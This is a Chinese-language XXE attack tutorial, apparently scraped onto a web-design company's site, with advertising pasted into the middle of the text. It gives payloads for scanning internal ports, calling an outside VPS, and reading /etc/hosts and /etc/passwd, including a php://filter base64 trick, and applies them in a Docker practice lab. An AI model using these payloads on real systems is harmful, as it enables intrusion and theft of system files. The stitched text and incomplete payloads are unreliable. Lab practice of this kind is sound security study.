利用xxe獲取linux系統(tǒng)的passwd

引用外部DTD文件訪問(wèn)內(nèi)網(wǎng)主機(jī)/端口。

創(chuàng)新互聯(lián)建站服務(wù)項(xiàng)目包括云巖網(wǎng)站建設(shè)、云巖網(wǎng)站制作、云巖網(wǎng)頁(yè)制作以及云巖網(wǎng)絡(luò)營(yíng)銷策劃等。多年來(lái)，我們專注于互聯(lián)網(wǎng)行業(yè)，利用自身積累的技術(shù)優(yōu)勢(shì)、行業(yè)經(jīng)驗(yàn)、深度合作伙伴關(guān)系等，向廣大中小型企業(yè)、政府機(jī)構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案，云巖網(wǎng)站推廣取得了明顯的社會(huì)效益與經(jīng)濟(jì)效益。目前，我們服務(wù)的客戶以成都為中心已經(jīng)輻射到云巖省份的部分城市，未來(lái)相信會(huì)繼續(xù)擴(kuò)大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任！

<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> （看響應(yīng)時(shí)間）

引用外部DTD文件訪問(wèn)wai網(wǎng)。

<!DOCTYPE a SYSTEM "http://vps_ip" >

引用內(nèi)部實(shí)體。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部實(shí)體讀本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部實(shí)體訪問(wèn)內(nèi)wang主機(jī)端口。

<!DOCTYPE a SYSTEM "http://192.168.1.2:80">（看響應(yīng)時(shí)間）

外部實(shí)體訪問(wèn)wai網(wǎng)。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>

docker中下載rrodrigo/xxelab該鏡像

啟動(dòng)：docker run -d -p 8082:80 rrodrigo/xxelab

抓取注冊(cè)包，發(fā)現(xiàn)采用xml格式傳遞，且郵箱有返回：

將返回內(nèi)容處進(jìn)行xxe回顯設(shè)置讀取/etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>

利用base64編碼進(jìn)行xxe，防止有返回包驗(yàn)證

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>

返回base64數(shù)據(jù)包，base64解碼

網(wǎng)站欄目：利用xxe獲取linux系統(tǒng)的passwd
文章起源：http://muchs.cn/article38/iiojpp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供虛擬主機(jī)、企業(yè)建站、移動(dòng)網(wǎng)站建設(shè)、全網(wǎng)營(yíng)銷推廣、域名注冊(cè)、商城網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)